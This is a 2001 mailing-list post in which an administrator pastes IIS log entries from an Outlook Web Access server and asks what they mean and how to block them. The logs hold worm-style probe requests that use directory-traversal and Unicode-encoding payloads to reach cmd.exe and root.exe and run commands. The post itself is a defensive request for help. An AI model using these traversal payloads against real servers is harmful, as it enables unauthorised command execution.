RE: Help with OWA hack?

Fri, 05 Oct 2001 12:21:53 -0700 

I am realitively new to all this 2000 stuff.  I have found some weird stuff
in the syslog of a OWA machine on our network:

2001-10-03 14:58:11 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/root.exe /c+dir 404 3396 72 62 HTTP/1.0 www - - -
2001-10-03 14:58:13 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/MSADC/root.exe /c+dir 403 3439 70 0 HTTP/1.0 www - - -
2001-10-03 14:58:15 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 3396 80 16 HTTP/1.0 www - - -
2001-10-03 14:58:17 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 3396 80 0 HTTP/1.0 www - - -
2001-10-03 14:58:28 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
2001-10-03 14:58:29 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117
0 HTTP/1.0 www - - -
2001-10-03 14:58:31 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117
0 HTTP/1.0 www - - -
2001-10-03 14:58:36 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 3439 145 0 HTTP/1.0 www - - -
2001-10-03 14:58:38 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 0 97 0 HTTP/1.0 www - - -
2001-10-03 14:58:48 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
2001-10-03 14:58:50 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
2001-10-03 14:58:51 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
2001-10-03 14:58:55 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 98 0 HTTP/1.0 www - - -
2001-10-03 14:58:56 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 100 0 HTTP/1.0 www - -
-
2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -

What is this?  I imagine its some kind of hack.  How do I prevent this.  I
cannot use the lockdown tool as this is a machine running Outlook Web
Access.

Thank for the help.

Regards,
Mark Palmer

Reply via email to